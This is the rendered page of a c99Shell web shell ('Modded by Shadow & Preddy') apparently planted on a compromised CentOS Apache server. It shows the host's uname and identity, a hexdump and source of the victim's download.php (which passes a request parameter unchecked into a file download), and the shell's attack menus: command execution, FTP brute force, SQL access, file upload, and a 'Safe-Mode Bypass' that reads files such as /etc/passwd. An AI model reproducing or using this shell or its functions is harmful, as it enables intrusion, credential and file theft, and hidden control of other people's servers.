!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/   drwxr-xr-x
Free 40.56 GB of 127.8 GB (31.73%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     download.php (409 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/manage/download.php
Size 409 B
MD5 d65e1a323b2fdfade1cca2f8353d72fb
Owner/Group apache/apache
Perms-rw-r--r--
Create time 03/07/2013 18:31:17
Access time 03/10/2024 15:59:56
MODIFY time 05/08/2012 20:55:48

FULL HEXDUMP
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
3C 3F 70 68 70 0D 0A 69 6E 63 6C 75 64 65 5F 6F 6E 63 65 28 22 63 6F 6E
66 69 67 75 72 61 74 69 6F 6E 2E 70 68 70 22 29 3B 0D 0A 69 6E 63 6C 75
64 65 5F 6F 6E 63 65 28 22 69 6E 63 6C 75 64 65 2F 46 75 6E 63 74 69 6F
6E 2E 70 68 70 22 29 3B 0D 0A 0D 0A 73 77 69 74 63 68 28 24 5F 52 45 51
55 45 53 54 5B 22 70 61 74 68 22 5D 29 7B 0D 0A 09 63 61 73 65 20 22 70
6C 61 6E 22 20 3A 20 24 64 6F 63 50 61 74 68 20 3D 20 73 75 62 73 74 72
28 24 50 6C 61 6E 50 69 63 50 61 74 68 2C 33 29 3B 20 62 72 65 61 6B 3B
0D 0A 09 63 61 73 65 20 22 61 62 73 65 6E 74 22 20 3A 20 24 64 6F 63 50
61 74 68 20 3D 20 73 75 62 73 74 72 28 24 41 62 73 65 6E 74 50 69 63 50
61 74 68 2C 33 29 3B 20 62 72 65 61 6B 3B 0D 0A 09 63 61 73 65 20 22 72
65 73 65 61 72 63 68 22 20 3A 20 24 64 6F 63 50 61 74 68 20 3D 20 73 75
62 73 74 72 28 24 52 65 73 65 61 72 63 68 50 69 63 50 61 74 68 2C 33 29
3B 20 62 72 65 61 6B 3B 0D 0A 09 63 61 73 65 20 22 71 61 22 20 3A 20 24
64 6F 63 50 61 74 68 20 3D 20 73 75 62 73 74 72 28 24 51 41 50 69 63 50
61 74 68 2C 33 29 3B 20 62 72 65 61 6B 3B 0D 0A 7D 0D 0A 09 0D 0A 64 6F
77 6E 6C 6F 61 64 46 69 6C 65 28 24 64 6F 63 50 61 74 68 2E 24 5F 52 45
51 55 45 53 54 5B 22 66 69 6C 65 6E 61 6D 65 22 5D 29 3B 0D 0A 0D 0A 3F
3E
<?php  include_once("con
figuration.php");  inclu
de_once("include/Functio
n.php");    switch($_REQ
UEST["path"]){   case "p
lan" : $docPath = substr
($PlanPicPath,3); break;
   case "absent" : $docP
ath = substr($AbsentPicP
ath,3); break;   case "r
esearch" : $docPath = su
bstr($ResearchPicPath,3)
; break;   case "qa" : $
docPath = substr($QAPicP
ath,3); break;  }     do
wnloadFile($docPath.$_RE
QUEST["filename"]);    ?
>

HEXDUMP: [Full] [Preview]
Base64:
[Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0081 ]--